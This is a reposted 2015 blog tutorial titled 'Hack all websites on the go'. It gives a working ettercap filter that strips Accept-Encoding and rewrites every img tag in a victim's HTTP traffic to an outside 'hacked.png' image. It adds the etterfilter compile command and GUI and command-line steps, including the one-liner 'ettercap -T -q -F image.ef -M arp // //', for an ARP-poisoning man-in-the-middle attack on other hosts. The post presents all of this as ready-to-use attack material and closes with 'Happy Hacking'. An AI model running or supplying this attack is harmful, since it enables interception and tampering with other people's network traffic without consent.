HTTP://zicutake.usacomment.com *Illegal content? / send an email zicutake@live.com with link to withdrawal from the post!
USAComment.com
ZicutaKE | Search Articles




Friday, May 22, 2015

Hack all websites on the go, replace all images on the victims computer

Today we will see how we can replace images on the go on the victims computer. It will appear that all websites have been hacked. The trick is to execute a man in the middle attack and then search for the packets containing images and replace the images as we wish. To accomplish this we will use ettercap filter.
1. The first step is to design an ettercap filter.Copy paste the following code in the directory     usr/share/ettercap. Give the text document the name image.filter


############################################################################
#                                                                                                                                 #
#  Agent47                                                                                                                #
#                                                                                                                                 #
#  By agent47. based on code from iron geek                                                    #
#  Along with some help from Kev and jon.dmml                                           #
#  http://ettercap.sourceforge.net/forum/viewtopic.php?t=2833              #
#                                                                          #
#  This program is free software; you can redistribute it and/or modify    #
#  it under the terms of the GNU General Public License as published by #
#  the Free Software Foundation; either version 2 of the License, or       #
#  (at your option) any later version.                                     #
#                                                                          #
############################################################################
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!"); 
 # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("img src=", "img src=\"http://4.bp.blogspot.com/-TX0nKt_6auU/VW1Wo4bXESI/AAAAAAAAGow/4JBzFUAtkxM/s1600/hacked.png\" ");
   replace("IMG SRC=", "img src=\"http://4.bp.blogspot.com/-TX0nKt_6auU/VW1Wo4bXESI/AAAAAAAAGow/4JBzFUAtkxM/s1600/hacked.png\" ");
   msg("Filter Ran.\n");
}



2   Now we have to compile the filter in to the format recognizable by ettercap. Open a new terminal in the same directory.Give the following command. command will execute and we will see the process result.

etterfilter image.filter -o image.ef


3   We are ready with the filter now. close all terminals. open a new terminal and write ettercap -G. Start unified sniffing. Select your interface. Scan for hosts and add the router Ip to one target and other Ip as second target. Start MITM with remote connections sniffing as well and start sniffing.









4   Now go to filters. Load a filter and select our filter image.ef and load it.




An alternate method to accomplish all of ettercap stuff is to run the fol command
ettercap -T -q -F image.ef -M arp // //

As the victim will browse through the web, Most of the images will be replaced by the image specified by our filter.



Happy Hacking